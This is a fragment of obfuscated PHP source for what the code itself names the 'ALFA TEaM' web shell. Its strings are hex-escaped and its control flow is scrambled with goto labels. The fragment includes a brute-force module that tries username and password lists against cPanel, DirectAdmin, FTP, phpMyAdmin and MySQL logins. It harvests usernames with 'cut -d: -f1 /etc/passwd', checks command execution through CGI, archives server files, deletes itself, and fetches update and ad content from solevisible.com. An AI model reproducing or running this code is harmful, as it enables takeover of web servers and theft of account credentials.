curl_setopt($process, CURLOPT_HEADER, 0); curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent); curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); curl_setopt($process, CURLOPT_ENCODING, $this->compression); curl_setopt($process, CURLOPT_TIMEOUT, 30); if ($this->ssl) { curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false); } if ($this->cookies) { curl_setopt($process, CURLOPT_COOKIEFILE, $this->path); curl_setopt($process, CURLOPT_COOKIEJAR, $this->path); } if ($this->proxy) { curl_setopt($process, CURLOPT_PROXY, $this->proxy); } if ($method == "\x70\157\163\x74") { curl_setopt($process, CURLOPT_POSTFIELDS, $data); curl_setopt($process, CURLOPT_POST, 1); curl_setopt($process, CURLOPT_HTTPHEADER, array("\x43\x6f\156\x74\x65\x6e\x74\x2d\x54\x79\160\x65\x3a\40\x61\x70\160\154\x69\x63\x61\164\151\157\x6e\x2f\x78\55\x77\x77\167\x2d\146\157\x72\x6d\x2d\165\162\154\x65\156\x63\x6f\x64\145\144")); } $return = @curl_exec($process); curl_close($process); return $return; } function error($error) { echo "\74\x63\145\x6e\164\x65\162\x3e\74\x64\151\x76\40\x73\x74\x79\154\145\75\47\167\151\144\164\150\x3a\x35\60\x30\160\170\73\142\157\162\x64\x65\162\72\40\x33\160\170\40\x73\157\x6c\x69\144\x20\x23\106\x46\105\x45\106\x46\73\x20\x70\141\x64\144\x69\156\147\72\40\x33\x70\x78\73\x20\x62\141\143\153\x67\x72\157\x75\x6e\144\x2d\x63\157\x6c\157\162\x3a\40\x23\x46\x46\104\104\106\x46\x3b\146\157\156\164\x2d\146\141\155\x69\x6c\x79\x3a\40\x76\145\162\x64\x61\156\x61\73\x20\x66\157\x6e\164\55\163\x69\x7a\x65\x3a\x20\61\x30\x70\170\47\76\x3c\142\x3e\143\125\x52\x4c\40\x45\162\x72\x6f\162\x3c\57\142\76\74\142\162\76{$error}\x3c\x2f\x64\x69\x76\x3e\74\x2f\x63\x65\156\x74\145\162\x3e"; die; } } goto GoQ6c; YNiqE: function alfaaboutus() { alfahead(); echo "\74\144\151\166\40\143\x6c\x61\163\x73\x3d\x22\150\145\141\x64\x65\162\x22\76"; $news = new AlfaCURL(); $about_us = $news->Send("\150\x74\164\x70\x3a\x2f\x2f\163\157\154\145\166\151\x73\151\x62\154\x65\x2e\143\157\155\57\141\x62\157\165\164\165\x73\x2e\160\150\160"); if (empty($about_us)) { $about_us = "\x3c\x70\162\145\x3e\74\x63\x65\156\164\x65\162\76\x3c\151\x6d\147\40\163\x72\143\75\x27\150\164\x74\x70\x3a\57\x2f\x73\157\x6c\x65\x76\151\x73\x69\142\154\x65\56\143\157\x6d\x2f\x69\155\x61\147\145\163\57\x66\x61\162\x76\141\150\141\x72\x2d\x69\x72\x61\156\x2e\x70\x6e\147\x27\76\74\x62\162\76\xa\74\x62\76\x3c\146\x6f\156\x74\x20\163\151\x7a\145\x3d\x27\53\63\47\x20\x63\x6f\x6c\x6f\162\75\47\x23\60\x30\101\x32\62\60\x27\x3e\x26\43\x39\67\x37\x34\x3b\40\x7e\x20\120\x45\x41\103\x45\40\176\40\x26\x23\x39\67\x37\x34\73\74\x2f\146\x6f\156\x74\76\74\142\162\76\74\142\76\12\x3c\146\157\156\164\x20\143\157\154\x6f\x72\x3d\47\43\60\60\x41\x32\x32\60\x27\x3e\123\150\x65\x6c\154\x20\x43\157\144\145\x64\x20\102\x79\x20\123\x6f\154\145\x20\x53\141\x64\40\46\x20\111\x6e\166\x69\x73\151\x62\154\x65\40\x28\x41\114\106\101\x20\124\105\141\x4d\51\74\57\146\x6f\156\164\x3e\x3c\142\x72\76\12\74\x66\157\156\x74\x20\x63\157\154\x6f\162\x3d\x27\x23\x30\x30\101\x32\x32\x30\x27\x3e\x43\157\x6e\164\x61\143\x74\x20\72\40\163\x6f\154\145\166\151\x73\151\142\154\x65\x40\147\x6d\141\x69\x6c\x2e\143\x6f\x6d\x3c\57\146\157\156\164\x3e\x3c\142\162\x3e\xa\74\x66\x6f\156\164\40\143\x6f\154\x6f\x72\75\47\43\x30\x30\x41\x32\x32\x30\x27\76\124\145\x6c\x65\147\x72\x61\x6d\x20\x43\x68\141\156\x6e\x65\x6c\72\40\100\x73\x6f\x6c\x65\x76\x69\163\x69\142\x6c\145\x3c\x2f\146\157\x6e\x74\76\74\x62\162\x3e\xa\x3c\x66\157\x6e\x74\40\143\157\154\157\162\x3d\47\43\106\x46\x46\x46\x46\106\47\x3e\123\153\171\x70\x65\x20\x3a\x20\145\150\x73\x61\x6e\x2e\x69\x6e\166\x69\163\151\142\154\x65\74\x2f\146\x6f\156\x74\x3e\74\x62\162\76\xa\x3c\146\157\156\164\x20\x63\x6f\x6c\x6f\x72\75\x27\x23\106\106\x46\106\x46\106\47\76\x53\x6b\x79\160\145\40\72\x20\163\x6f\154\145\x2e\163\x61\x64\x3c\57\x66\x6f\156\x74\76\74\x62\x72\76\12\x3c\x66\157\156\x74\40\x63\157\x6c\157\x72\75\x27\43\106\106\x30\x30\60\60\x27\76\120\x65\x72\x73\151\x61\x6e\x20\107\165\154\x66\x20\x46\157\162\40\x45\x76\x65\162\74\x2f\146\157\156\x74\76\x3c\x62\x72\x3e\xa\74\x66\x6f\156\164\x20\143\157\154\157\x72\75\x27\x23\x46\106\60\x30\x30\60\47\76\x49\x72\x61\x6e\151\141\x6e\x20\120\162\x6f\x67\x72\141\x6d\155\145\x72\163\x3c\57\146\157\x6e\x74\x3e\74\142\x72\x3e\12\74\146\157\156\164\40\143\157\154\157\162\x3d\x27\x23\106\106\x30\x30\x30\60\47\x3e\43\x23\43\x23\43\x23\43\43\x23\43\x23\x23\74\x2f\x66\157\156\x74\x3e\x3c\142\162\76\xa\x3c\x2f\143\145\x6e\x74\x65\x72\x3e\74\x2f\x70\162\x65\x3e\x3c\151\x66\x72\x61\155\145\40\163\162\x63\x3d\x27\164\x67\x3a\57\57\162\145\163\157\154\x76\145\x3f\x64\x6f\155\141\151\x6e\75\163\157\x6c\145\x76\x69\163\x69\142\154\145\x27\40\x66\x72\x61\x6d\x65\x62\157\162\x64\x65\x72\75\x27\60\47\x20\x77\x69\x64\x74\150\x3d\x27\x30\x27\40\150\145\x69\x67\x68\x74\75\47\60\47\x3e\x3c\57\x69\146\x72\141\155\x65\76"; } echo __pre() . $about_us; echo "\74\57\x64\x69\166\x3e"; alfafooter(); } goto Rdxmc; G40hn: die; goto vH5gS; DIhO_: if (!function_exists("\163\143\x61\156\144\151\x72")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto OpFog; gIiwJ: function findicon($file, $type) { $s = "\150\164\x74\x70\72\x2f\x2f\x73\157\x6c\145\x76\151\x73\151\x62\154\x65\x2e\x63\157\x6d\57\151\143\157\156\x73\57"; $types = array("\152\163\x6f\156", "\x70\x70\164", "\160\160\164\170", "\170\154\163", "\170\154\x73\170", "\155\x73\x69", "\x63\x6f\156\146\x69\x67", "\143\147\x69", "\x70\x6d", "\143", "\x63\x70\x70", "\x63\x73", "\x6a\x61\x76\x61", "\x61\x73\x70\170", "\x61\163\160", "\144\142", "\x74\164\x66", "\x65\x6f\164", "\x77\x6f\x66\146", "\167\x6f\146\146\62", "\167\x6f\146\146", "\x63\157\x6e\x66", "\154\157\x67", "\141\x70\x6b", "\x63\141\x62", "\142\172\62", "\164\147\x7a", "\x64\x6d\x67", "\x69\172\157", "\x6a\x61\x72", "\67\x7a", "\x69\163\157", "\162\141\162", "\x62\141\x74", "\163\150", "\141\154\x66\141", "\147\172", "\x74\141\162", "\x70\150\160", "\x70\x68\160\x34", "\160\x68\160\x35", "\x70\150\x74\x6d\x6c", "\150\164\x6d\x6c", "\170\x68\x74\155\154", "\163\150\164\x6d\154", "\x68\164\x6d", "\x7a\151\160", "\x70\156\147", "\152\160\x67", "\152\x70\145\147", "\147\x69\x66", "\x62\155\160", "\x69\x63\x6f", "\164\x78\x74", "\x6a\163", "\162\x62", "\160\x79", "\x78\x6d\x6c", "\x63\x73\163", "\163\x71\x6c", "\150\x74\x61\143\143\x65\x73\x73", "\x70\154", "\151\156\x69", "\x64\154\154", "\x65\x78\145", "\x6d\160\x33", "\155\160\64", "\155\64\x61", "\155\157\x76", "\x66\154\x76", "\x73\x77\146", "\x6d\153\166", "\x61\x76\x69", "\167\x6d\x76", "\x6d\x70\147", "\x6d\160\145\x67", "\x64\141\164", "\160\144\x66", "\63\x67\x70", "\144\x6f\143", "\x64\x6f\143\170", "\144\157\x63\155"); if ($type != "\x66\151\x6c\145") { return $file == "\x2e\x2e" ? $s . "\142\x61\143\153\56\x70\x6e\147" : $s . "\x66\157\154\144\145\x72\x2e\x70\156\x67"; } else { $ext = explode("\x2e", $file); $ext = end($ext); $ext = strtolower($ext); return in_array($ext, $types) ? $s . $ext . "\x2e\x70\156\147" : $s . "\x6e\x6f\164\146\x6f\x75\x6e\144\56\160\x6e\147"; } } goto NkkuH; qsZZV: function __alfaziper($source, $destination) { if (!extension_loaded("\x7a\151\160") || !file_exists($source)) { return false; } $zip = new ZipArchive(); if (!$zip->open($destination, ZIPARCHIVE::CREATE)) { return false; } $source = str_replace("\x5c", "\x2f", realpath($source)); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = str_replace("\x5c", "\57", $file); if (in_array(substr($file, strrpos($file, "\57") + 1), array("\x2e", "\x2e\x2e"))) { continue; } $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "\x2f", '', $file . "\57")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "\x2f", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } goto vrEEO; gNx00: function clean_string($string) { if (function_exists("\x69\143\157\156\x76")) { $s = trim($string); $s = iconv("\125\124\x46\x2d\70", "\x55\124\106\55\70\57\x2f\x49\107\x4e\117\122\105", $s); } return $s; } goto YQHDC; fabm5: function showAnimation($name) { return "\55\x77\145\142\153\151\164\55\141\x6e\x69\155\x61\164\151\x6f\156\72\40" . $name . "\x20\70\60\60\x6d\x73\x20\145\x61\x73\145\55\x69\156\x2d\157\165\x74\40\x66\157\162\x77\141\x72\x64\x73\x3b\55\155\x6f\x7a\x2d\x61\156\x69\155\141\164\151\157\x6e\72\40" . $name . "\x20\70\60\x30\x6d\x73\40\145\x61\163\145\55\151\156\x2d\x6f\x75\x74\x20\146\x6f\x72\x77\x61\162\x64\x73\73\55\x6d\x73\55\141\156\151\x6d\141\x74\x69\x6f\x6e\72\x20" . $name . "\x20\x38\x30\60\155\x73\40\145\141\x73\145\55\151\x6e\x2d\x6f\x75\164\40\x66\x6f\x72\x77\141\162\144\x73\x3b\x61\x6e\x69\x6d\x61\164\x69\157\156\x3a\x20" . $name . "\40\70\60\x30\155\163\x20\x65\141\163\x65\x2d\151\x6e\55\x6f\x75\x74\40\x66\x6f\x72\167\x61\162\144\163\73"; } goto gUiRZ; vT9b4: $CWppUDJxuf = "\x66\x75" . "\x6e" . "\x63\164" . "\151\x6f\x6e\x5f" . "\x65" . "\x78\151\163\x74" . "\x73"; goto fAaD3; hho1B: $xd .= "\x53\x65\162\x76\145\162\x20\x4f\160\x65\162\x61\x74\151\x6e\147\x20\123\x79\163\x74\145\155\40\x3a\x20" . $_SERVER["\123\105\x52\x56\105\x52\x5f\x53\x4f\106\x54\127\101\122\105"] . "\15\xa"; goto Vyc3A; Gw1Wi: function alfacheckupdate() { if ($GLOBALS["\104\102\137\x4e\101\115\x45"]["\143\147\151\137\141\x70\x69"]) { if (!isset($_COOKIE["\141\x6c\x66\141\143\147\x69\x61\160\151\x5f\x6d\x6f\144\x65"]) && !isset($_COOKIE["\141\154\x66\141\x63\x67\151\x61\x70\x69"])) { _alfa_cgicmd("\x77\150\157\141\x6d\x69", "\x70\x65\162\x6c", true); if (strlen(alfaEx("\x77\x68\x6f\141\155\151", false, true)) > 0) { __alfa_set_cookie("\141\154\146\141\x5f\143\141\156\x72\x75\x6e\x63\x6d\144", "\x74\162\x75\145"); } } } if (function_exists("\143\x75\x72\x6c\x5f\166\x65\162\163\x69\157\156")) { $update = new AlfaCURL(); $json = $update->Send("\x68\164\x74\x70\72\57\57\163\157\154\145\x76\151\163\151\x62\x6c\x65\x2e\143\157\x6d\x2f\165\160\x64\x61\164\145\56\152\x73\157\156\x3f\166\x65\162\75" . __ALFA_VERSION__); $json = @json_decode($json, true); $data = array(); if ($json) { if (!isset($_COOKIE["\141\x6c\x66\141\137\143\x68\x65\143\153\x75\160\144\x61\164\145"]) && !empty($json["\x74\171\x70\x65"])) { if ($json["\x74\171\160\145"] == "\165\x70\x64\x61\x74\x65") { if (__ALFA_VERSION__ != $json["\x76\145\x72\x73\151\x6f\x6e"] || __ALFA_UPDATE__ != $json["\166\x65\162\x73\151\157\156\137\x6e\165\155\x62\x65\162"]) { @setcookie("\141\154\x66\x61\x5f\143\150\145\x63\153\x75\160\x64\141\x74\145", "\61", time() + 86400); $data["\143\x6f\x6e\164\145\156\x74"] = "\74\144\151\x76\40\143\x6c\x61\x73\163\x3d\42\165\x70\x64\x61\164\x65\x2d\x68\157\154\x64\x65\162\x22\76" . $json["\x63\157\156\x74\145\x6e\164"] . "\x3c\57\144\151\x76\x3e"; } } } if (isset($json["\x61\x64\x73"]) && !empty($json["\141\144\163"])) { $data["\143\x6f\x6e\164\145\156\x74"] .= $json["\x61\144\163"]; } if (isset($json["\x63\x6f\160\x79\x72\151\x67\x68\164"]) && !empty($json["\143\157\x70\171\x72\x69\147\150\164"])) { $data["\x63\157\x70\x79\x72\x69\x67\150\164"] = $json["\x63\x6f\x70\x79\x72\x69\x67\150\x74"]; } if (isset($json["\163\157\x6c\145\x76\151\x73\151\142\154\x65"]) && !empty($json["\163\157\154\x65\x76\x69\x73\x69\142\x6c\x65"])) { $data["\x73\x6f\x6c\x65\x76\151\163\151\142\154\x65"] = $json["\163\x6f\154\145\166\x69\x73\151\142\x6c\145"]; } if (isset($json["\143\157\x64\145\x5f\156\x61\155\145"]) && !empty($json["\x63\x6f\x64\x65\137\156\x61\155\145"])) { $data["\x63\157\x64\145\x5f\x6e\x61\155\145"] = $json["\x63\x6f\x64\145\137\x6e\141\x6d\145"]; $data["\166\145\x72\x73\151\x6f\156\137\x6e\x75\155\142\145\162"] = __ALFA_VERSION__; } if (isset($json["\155\141\x72\x6b\x65\x74"]) && !empty($json["\155\x61\162\153\x65\x74"])) { $data["\155\141\162\x6b\x65\164"] = $json["\x6d\x61\x72\153\145\x74"]; } echo @json_encode($data); } } } goto kavzq; LJenm: function Alfa_DirectAdmin_Cracker($info) { if (!$info["\155\x79\163\161\x6c"]) { $url = $info["\160\x72\157\164\157\x63\157\x6c"] . $info["\164\x61\162\147\x65\x74"] . "\72" . $info["\160\x6f\x72\x74"] . "\x2f\x43\x4d\x44\x5f\x4c\117\107\x49\x4e"; } else { $url = $info["\x70\x72\x6f\164\x6f\x63\157\x6c"] . $info["\164\141\162\147\145\x74"] . "\x2f\160\150\160\x6d\x79\x61\x64\x6d\x69\x6e"; } $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "\x4d\157\x7a\x69\x6c\154\141\x2f\65\56\x30\40\x28\x57\x69\x6e\144\157\x77\x73\x20\116\x54\x20\66\56\x32\x3b\40\127\x4f\127\x36\x34\73\40\162\166\x3a\x31\x37\x2e\60\51\40\x47\145\143\153\x6f\x2f\x32\x30\61\x30\x30\x31\x30\x31\40\106\151\162\x65\x66\x6f\x78\57\x31\x37\x2e\60"); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERPWD, $info["\x75\163\x65\162\x6e\141\x6d\x65"] . "\x3a" . $info["\x70\x61\163\163\x77\157\x72\x64"]); if ($info["\x6d\171\x73\161\x6c"]) { curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY); } $result = @curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) { echo "\x3c\146\x6f\156\x74\x20\x63\x6f\x6c\x6f\162\75\47\x72\145\x64\47\76\x45\x72\162\157\x72\72\40{$curl_error}\x3c\57\146\157\x6e\164\76\74\142\x72\76"; } elseif (preg_match("\57\x43\115\104\x5f\106\111\x4c\x45\x5f\115\x41\x4e\101\x47\x45\122\174\x66\162\141\x6d\145\x73\145\164\x2f\x69", $result)) { echo "\x55\163\145\x72\116\x61\x6d\145\x3a\x20\x3c\146\157\156\x74\40\x63\x6f\x6c\157\x72\75\42\x72\145\144\42\76" . $info["\165\x73\x65\x72\x6e\x61\x6d\145"] . "\74\57\x66\x6f\156\164\x3e\x20\x50\141\163\163\127\157\162\x64\72\x20\74\x66\157\x6e\x74\40\143\x6f\x6c\x6f\162\75\x22\x72\x65\x64\42\76" . $info["\160\x61\163\x73\167\x6f\162\144"] . "\74\x2f\146\x6f\x6e\164\76\x3c\x66\157\156\164\x20\x63\157\154\x6f\162\75\x22\x67\x72\145\145\x6e\x22\x3e\40\x20\x4c\x6f\x67\x69\x6e\40\123\165\143\x63\x65\163\x73\56\56\56\56\x3c\x2f\x66\157\156\164\76\x3c\x62\162\76"; $info["\x74\x61\162\x67\x65\164"] = $url; CrackerResualt($info); } curl_close($curl); } goto pr6oW; tI2qh: function alfaCrackers() { alfahead(); AlfaNum(9, 10); echo "\x3c\144\x69\x76\40\143\x6c\x61\x73\163\75\x22\x68\145\x61\x64\x65\162\42\76\74\x63\x65\x6e\x74\145\162\x3e\74\x62\x72\76\x3c\x64\x69\166\40\143\x6c\x61\x73\163\75\42\x74\x78\x74\146\x6f\156\x74\137\x68\x65\141\x64\145\162\42\x3e\174\40\102\x72\165\x74\x65\40\x46\x6f\162\143\x65\162\40\174\x3c\57\x64\151\x76\76\x3c\142\x72\76\74\x62\162\x3e\74\x66\157\162\155\x20\155\145\x74\150\x6f\144\x3d\x22\160\157\x73\164\42\x20\x6f\156\163\x75\142\x6d\151\x74\x3d\42\x67\50\x27\103\x72\141\x63\153\145\x72\163\x27\x2c\x6e\165\154\x6c\54\x74\x68\151\x73\x2e\164\141\x72\x67\x65\x74\56\x76\x61\154\165\145\54\164\150\x69\x73\56\160\157\162\x74\56\166\x61\154\x75\x65\54\164\x68\151\x73\x2e\165\163\145\x72\x6e\x61\155\145\x73\x2e\x76\x61\154\x75\x65\x2c\164\x68\x69\x73\x2e\160\141\x73\163\x77\x6f\x72\x64\x73\56\166\141\x6c\165\x65\54\x74\x68\151\x73\56\146\143\x72\141\x63\x6b\56\x76\141\x6c\x75\145\54\x27\x73\164\141\162\164\47\54\x74\150\151\163\56\x70\x72\157\x74\157\x63\157\x6c\x2e\166\141\154\x75\x65\54\164\150\151\x73\56\154\x6f\147\x69\156\x70\x61\156\145\x6c\x2e\166\141\154\x75\x65\51\73\x72\x65\x74\165\162\x6e\40\146\x61\154\163\145\x3b\x22\x3e\x3c\x64\x69\166\x20\143\x6c\x61\163\163\75\42\x74\x78\x74\146\157\156\164\x22\76\x4c\x6f\147\x69\156\40\x50\x61\x67\x65\x3a\40\x3c\x73\x65\154\145\x63\164\40\x6f\x6e\143\154\x69\143\153\x3d\42\x64\151\163\137\151\156\x70\x75\x74\50\x74\x68\x69\x73\56\166\141\154\165\145\51\73\x22\x20\156\141\155\x65\x3d\x22\154\157\x67\x69\156\160\x61\156\x65\154\x22\x3e"; foreach (array("\x63\x70" => "\103\160\141\156\x65\154", "\x64\151\162\145\x63\164" => "\104\x69\162\145\143\x74\x41\x64\155\x69\156", "\146\164\x70" => "\x46\124\120", "\160\150\160\155\x79\141\144\155\151\x6e" => "\x50\x68\160\115\171\x41\x64\x6d\151\156\x5b\104\151\x72\x65\x63\164\101\144\x6d\x69\x6e\135", "\x6d\171\x73\161\154" => "\x6d\x79\x73\x71\154\137\x63\x6f\156\156\x65\x63\164\50\51", "\x66\x74\160\143" => "\146\164\x70\x5f\x63\x6f\156\x6e\145\x63\164\x28\x29") as $key => $val) { echo "\74\157\x70\x74\151\157\x6e\x20\x76\141\x6c\x75\x65\x3d\42" . $key . "\42\x3e" . $val . "\74\x2f\x6f\x70\x74\x69\157\156\x3e"; } echo "\74\x2f\163\145\x6c\145\x63\164\x3e\x20\120\162\x6f\x74\x6f\143\x6f\x6c\72\x20\x3c\163\x65\154\145\143\164\40\x69\144\75\42\x70\162\x6f\164\157\x63\157\154\x22\x20\x6e\141\155\145\x3d\42\160\162\x6f\x74\157\143\x6f\x6c\42\x3e"; foreach (array("\150\x74\164\x70\x73\72\57\57", "\x68\164\164\x70\x3a\x2f\x2f", "\x66\164\160\72\x2f\x2f") as $val) { echo "\74\157\160\164\x69\157\156\x20\x76\141\154\165\x65\x3d\42" . $val . "\42\76" . $val . "\74\x2f\157\x70\164\151\x6f\x6e\76"; } echo "\x3c\x2f\163\x65\154\145\x63\164\x3e\x20\x57\145\142\x73\x69\x74\145\x2f\151\160\40\101\144\144\162\145\163\163\x3a\40\x3c\x69\x6e\160\165\164\40\151\144\x3d\x22\164\141\x72\x67\145\164\x22\40\x74\x79\x70\145\x3d\42\x74\145\x78\164\42\40\156\x61\x6d\145\75\42\x74\x61\162\x67\145\x74\42\x20\166\141\x6c\x75\x65\75\x22\154\157\x63\141\154\x68\157\x73\x74\42\x3e\xa\x50\x6f\162\x74\x3a\40\x3c\151\156\160\x75\164\40\x69\144\x3d\x22\160\157\162\x74\42\x20\x74\x79\x70\145\x3d\42\164\145\170\164\x22\40\x6e\141\x6d\x65\75\x22\x70\x6f\x72\164\x22\x20\166\x61\154\x75\x65\75\42\x32\60\x38\63\x22\x3e\12\74\x74\141\x62\x6c\x65\40\167\151\x64\164\x68\75\42\63\x30\45\x22\76\74\x74\x64\40\141\x6c\151\147\x6e\x3d\42\x63\x65\x6e\164\145\x72\x22\x3e\x55\163\145\x72\x73\x20\114\151\163\x74\x3c\x2f\164\144\76\x3c\164\x64\40\x61\x6c\151\x67\156\75\x22\143\145\x6e\x74\145\x72\42\76\x50\141\x73\163\167\x6f\x72\144\x73\74\57\x74\x64\76\74\x2f\164\x61\x62\x6c\145\76\12\74\x74\x65\x78\x74\141\x72\x65\141\40\160\x6c\x61\143\x65\x68\157\x6c\144\145\x72\x3d\42\x55\163\x65\162\x73\42\40\162\157\167\163\75\42\x32\60\42\x20\x63\x6f\154\x73\75\42\x32\65\x22\x20\x6e\x61\x6d\145\75\x22\165\163\145\x72\x6e\141\155\x65\x73\42\x3e" . ($GLOBALS["\x73\x79\163"] == "\x75\156\151\170" ? alfaEx("\x63\x75\164\40\55\x64\72\40\x2d\x66\61\40\x2f\x65\164\x63\x2f\x70\141\x73\x73\x77\144") : '') . "\x3c\57\164\x65\170\164\x61\x72\145\x61\x3e\12\x26\156\142\x73\160\x20\74\x74\x65\170\164\141\x72\x65\x61\x20\x70\154\141\143\x65\x68\157\154\144\145\162\75\x22\120\141\163\x73\167\x6f\x72\x64\x73\x22\x20\162\157\x77\x73\x3d\x22\62\x30\42\x20\x63\x6f\154\x73\75\x22\62\65\42\40\x6e\x61\155\145\x3d\x22\160\x61\x73\x73\x77\x6f\162\144\x73\42\x3e\x3c\57\x74\x65\170\x74\141\162\x65\141\x3e\74\x62\162\x3e\x3c\x62\162\x3e\xa\123\x61\166\x65\x20\x52\145\163\x75\154\164\x20\x49\156\x74\157\x20\x46\x69\154\x65\x20\x3c\151\156\160\x75\164\x20\x74\171\x70\x65\75\42\x74\x65\x78\164\x22\x20\x6e\141\x6d\145\75\42\146\x63\x72\x61\143\153\x22\40\x76\141\x6c\x75\x65\75\x22\x63\162\x61\143\153\145\144\x2e\164\x78\x74\x22\76\12\74\x70\x3e\x3c\151\x6e\x70\165\x74\x20\164\x79\160\145\75\x22\x73\x75\x62\155\x69\164\42\40\x6e\x61\x6d\145\75\42\143\162\141\143\x6b\151\156\147\x22\40\x76\141\154\x75\x65\x3d\42\x20\x22\40\57\76\74\57\x64\151\x76\76\74\x2f\146\x6f\162\x6d\x3e\x3c\x2f\160\x3e\74\x63\145\156\x74\x65\x72\x3e"; $target = str_replace(array("\x68\x74\x74\160\163\72\57\x2f", "\150\x74\x74\160\72\57\57", "\146\164\160\72\x2f\x2f"), '', $_POST["\x61\x6c\x66\141\61"]); $port = $_POST["\141\x6c\x66\x61\x32"]; $usernames = $_POST["\x61\154\x66\x61\63"]; $passwords = $_POST["\x61\x6c\x66\141\64"]; $fcrack = $_POST["\141\154\146\141\65"]; $cracking = $_POST["\x61\154\146\x61\66"]; $protocol = $_POST["\x61\154\146\141\67"]; $loginpanel = $_POST["\141\154\x66\141\x38"]; $p = $loginpanel == "\x70\x68\x70\155\171\141\x64\155\151\x6e" ? $p = true : false; if ($cracking == "\163\164\141\162\164") { echo __pre(); $exuser = explode("\12", $usernames); $expw = explode("\xa", $passwords); foreach ($exuser as $user) { foreach ($expw as $pw) { $array = array("\x75\163\145\162\x6e\x61\x6d\x65" => trim($user), "\160\141\x73\x73\x77\157\162\x64" => trim($pw), "\160\x6f\x72\x74" => trim($port), "\x74\141\x72\147\x65\x74" => trim($target), "\160\162\157\164\157\143\x6f\154" => trim($protocol), "\146\x63\x72\x61\143\x6b" => trim($fcrack), "\x6d\x79\x73\x71\154" => $p); Alfa_Call_Function_Cracker($loginpanel, $array); } } echo "\74\142\162\x3e\x3c\146\157\156\x74\40\143\x6f\154\x6f\x72\75\x22\162\145\x64\42\x3e\101\x74\164\x61\x63\x6b\40\106\x69\x6e\x69\x73\x68\x65\144\56\56\x2e\74\57\146\157\x6e\164\76"; } echo "\x3c\57\144\x69\166\76"; alfafooter(); } goto hVRBs; JTfLu: function AlfaiFrameCreator($f, $width = "\x31\60\60\45", $height = "\x36\60\x30\x70\170") { return "\74\151\x66\x72\x61\x6d\145\40\x73\x72\143\x3d\x22" . __ALFA_DATA_FOLDER__ . "\x2f" . $f . "\42\x20\x77\151\144\164\150\75\x22" . $width . "\42\x20\x68\x65\x69\x67\x68\164\75\42" . $height . "\42\x20\x66\x72\x61\x6d\145\142\x6f\162\144\x65\x72\x3d\x22\60\x22\x3e\74\57\151\146\x72\x61\x6d\145\76"; } goto D73tS; ROY6n: function alfaselfrm() { if (isset($_POST["\141\154\146\141\x31"]) && $_POST["\x61\154\146\141\x31"] == "\x79\145\x73") { echo __pre() . "\74\x63\145\156\x74\145\162\x3e"; if (@unlink($GLOBALS["\137\137\146\151\154\x65\x5f\x70\141\164\150"])) { echo "\74\142\x3e\x53\150\145\154\x6c\x20\x68\x61\163\40\x62\145\x65\156\x20\162\x65\x6d\x6f\166\x65\144\74\57\151\x3e\40\x3a\x29\74\57\x62\x3e"; } else { echo "\165\x6e\x6c\151\156\153\x20\x65\x72\x72\157\x72\x21"; } echo "\74\57\x63\145\x6e\x74\x65\x72\x3e"; } if (isset($_POST["\x61\x6c\146\141\x31"]) && $_POST["\x61\x6c\146\141\61"] != "\x79\x65\163") { echo "\x3c\x64\151\x76\x20\143\154\141\163\163\75\x68\145\x61\x64\145\x72\x3e"; echo "\xa\x3c\x63\x65\x6e\164\145\x72\76\x3c\160\x3e\x3c\x69\x6d\x67\x20\163\162\143\x3d\42\150\164\x74\x70\x3a\57\57\163\x6f\x6c\145\x76\x69\163\x69\x62\x6c\145\56\143\x6f\155\x2f\x69\x6d\141\147\x65\163\57\146\x61\x72\x76\x61\150\x61\x72\x2d\x69\x72\141\156\56\x70\156\147\x22\x3e\x3c\x2f\160\x3e"; echo "\74\x70\x3e\74\144\151\x76\x20\143\x6c\141\x73\x73\x3d\42\x74\170\x74\146\x6f\x6e\x74\x22\76\x44\157\x20\x79\x6f\165\40\167\x61\x6e\164\40\x74\157\x20\144\145\x73\x74\162\157\171\x20\x6d\145\x3f\41\74\x2f\144\x69\x76\76\74\141\x20\150\x72\x65\146\75\x6a\141\166\x61\x73\x63\x72\151\160\x74\x3a\x76\157\x69\x64\x28\60\51\40\157\x6e\x63\x6c\x69\x63\153\75\x22\147\50\47\x73\x65\154\146\162\x6d\x27\x2c\156\x75\154\x6c\54\x27\x79\145\163\x27\51\73\x22\76\x20\131\x65\x73\74\x2f\141\x3e"; echo "\74\x2f\160\x3e\x3c\x2f\x63\x65\x6e\164\x65\x72\x3e\x3c\x2f\144\x69\x76\76"; } } goto bthgC; EZmej: $GLOBALS["\x63\167\144"] = isset($_POST["\143"]) && @is_dir($_POST["\x63"]) ? $_POST["\143"] : @alfaGetCwd(); goto f0Lpk; y_pCK: function alfaMakePwd() { if (_alfa_file_exists("\x2f\x65\164\143\x2f\x76\151\162\x74\165\141\x6c\57\x64\x6f\155\141\151\x6e\157\x77\156\x65\x72\x73") || _alfa_file_exists("\57\x65\x74\x63\57\156\x61\155\x65\144\x2e\143\157\x6e\146") && _alfa_file_exists("\x2f\145\164\x63\57\x76\141\x6c\x69\x61\x73\145\x73")) { return "\x2f\150\x6f\155\145\x2f\173\165\163\x65\x72\175\57\x70\x75\x62\154\151\143\x5f\x68\164\x6d\x6c\57"; } $document = explode("\x2f", $_SERVER["\104\117\x43\125\x4d\x45\x4e\124\x5f\x52\117\x4f\x54"]); $public = end($document); array_pop($document); array_pop($document); $path = implode("\x2f", $document) . "\57\x7b\165\x73\x65\x72\175\x2f" . $public; return 